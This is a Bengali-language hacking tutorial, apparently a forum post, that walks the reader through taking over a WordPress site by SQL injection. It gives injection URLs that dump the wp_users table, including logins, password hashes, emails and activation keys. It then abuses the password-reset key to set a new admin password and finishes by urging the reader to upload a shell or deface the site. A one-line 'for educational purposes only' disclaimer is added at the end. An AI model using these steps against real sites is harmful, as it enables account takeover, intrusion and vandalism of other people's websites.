ওয়ার্ডপ্রেস অত্যান্ত জনপ্রিয় একটা ওয়েব সফটওয়্যার। বলা বাহুল্য, ওয়েবডিজাইনারদের সাথে সাথে হ্যাকারদেরও একটা প্রিয় সফটওয়্যার

কারন এই সফটওয়্যারএ ব্যাবহার করা হয় নানা প্ল্যাগিন আর থিমস যেখানে অনেক ধরনের সিকিউরিটি দুর্বলতা থাকে।

এখন আমি বোঝানোর চেস্টা করবো, কীভাবে WP সাইটে SQLi করার পরে এডমিন এক্সেস নিবেন এবং শেল আপলোড দিয়ে সাইট ডিফেস করবেন।

আর হ্যা, আপনি যদি ম্যানুয়াল SQLi না পারেন তাহলে এই পোস্ট আপনার জন্যে না। আগে শিখে পরে এই পোস্ট পড়বেন।

কারন আমি এখানে কি ভাবে SQL Inject করা যায় সেটা আলোচনা করবোনা। পরবর্তীতে একটা পোস্ট দেবার ইচ্ছা আছে এইটা নিয়ে। অথবা টিটতে সার্চ করলেও বাংলা টুট পাবার কথা।

মনে করুন আমি একটা WP সাইটে এস্কিউএল মারলাম। এডমিন আইডি পেলাম পাসওয়ার্ডও পেলাম। কিন্তু সমস্যাটাই হয়ে যায় এই পাসওয়ার্ডে। এটা আমরা পেয়ে থাকি MD5 এনক্রিপ্টেড অবস্থায় যা ভাঙা অনেক ঝামেলা আর সময়ের ব্যাপার। আর আপন যদি নতুন হ্যাকার হয়ে থাকেন তাহলে তো কথাই নেই। মনে হবে এভারেস্ট জয়ের মত একটা ব্যাপার।

আর এই ঝামেলা থেকে মুক্তি দিতেই আজ আমার এই পোস্টের অবতারণা।

আসুন এবার কাজে নেমে যাই।

https://www.site.com/index.php?id=-92 UNION SELECT 1,2,3,4,group_concat(ID,0×40,user_login,0×40,user_pass,0×40,user_nicename,0×40,user_email,0×40,user_url,0×40,user_registered,0×40,user_activation_key,0×40,user_status,0×40,display_name),6,7,8,9,10,11,12,13,14,15,16,17,18+from+wp_users

মনে করি এটাই আমার ভিক্টিমের সাইট। এবং এস্কিউএল এর মাধ্যমে আমরা wp_users টেবিলের সব ডাটা পেয়ে গেলাম।

Ex. 1@admin@$P$BB3TMj.lT1ShUFL5gd31Yf7DX4kKEl.@admin@admin@site.com@2012-09-18 05:16:18@@0@admin

এখানে, পাসওয়ার্ড হিসাবে যে বস্তু আমাদের সামনে আসলো সেটা মোটামুটি এইরকম

$P$BB3TMj.lT1ShUFL5gd31Yf7DX4kKEl.

ভয়ের কোন ব্যাপার নাই, আমি এই হিব্রু ভাষা নিয়ে ঘাটাবো না

যাই হোক এখান থেকে প্রথমে আমাদের যেটা দরকার তা হল,

Username: admin

Email: [email protected]

পেয়ে গেলাম আমাদের দরকারি জিনিস।

এবার ব্রাউজারে আর একটা ট্যাব ওপেন করুন।

সেখানে যেয়ে সাইটের লগিন পেজ এ যান এভাবে।

https://www.site.com/wp-login.php

এডমিন লগিন পেজ আসবে। এবার সেখান থেকে Lost your password? এ ক্লিক করে এডমিনের ই মেইল আইডি দিন। (আগেই যেটা বের করা হয়েছে)

যেমন, আমি দিলাম, [email protected]

এবার গেট নিউ পাসওয়ার্ড এ ক্লিক করুন। আসল কাজ এখান থেকেই শুরু।

আগের ট্যাবে ফেরত যান, user_activation_key বাদে অন্য সব ফিল্ড মুছে ফেলুন।

যেমন, https://www.site.com/index.php?id=-92 UNION SELECT 1,2,3,4,group_concat(user_activation_key),6,7,8,9,10,11,12,13,14,15,16,17,18+from+wp_users

পেজ রিলোড করুন।

দেখুন একটা user_activation_key পাবেন। ধরুন আমারটা,

xxxxxxxx

এবার সাইটে যান, এবং নিচের ইউয়ারেলটি একটু এডিট করে বসিয়ে নিন। কি এডিট করতে হবে সেটা বলছি।

wp-login.php?action=rp&key=resetkey&login=username

এখানে key=resetkey এর resetkey হল আপনি যে user_activation_key পেয়েছেন, সেটাই।

মানে হল, key=xxxxxxxx

আর login=username এর username এর স্থানে আপনি যে আইডি হ্যাক করতে চাচ্ছেন সেই ইউজারনেম দিবেন।

যেমন, login=admin

তাহলে পুরা ব্যাপারটা যা দারালো, সেটা হলঃ

wp-login.php?action=rp&key=xxxxxxxx&login=admin

এইটুকু এবার আমার ভিক্টিম এর সাইটের লেজে বসিয়ে দিলেই কাজ ৯৫% শেষ!

যেমন, https://www.site.com/wp-login.php?action=rp&key=xxxxxxxx&login=admin

এবার পাসওয়ার্ড রিসেটের একটা পেজ আসবে, সেখানে নিউ পাসওয়ার্ড দিয়ে সাইটে প্রবেশ করুন।এবার শেল ঢোকান বা সাইট ডিফেস করে ফেলুন

**** শুধুমাত্র শিক্ষার উদ্যেশ্যে প্রকাশিত।

এই পোস্টটি সর্বপ্রথম এখানে প্রকাশিত হয়েছে।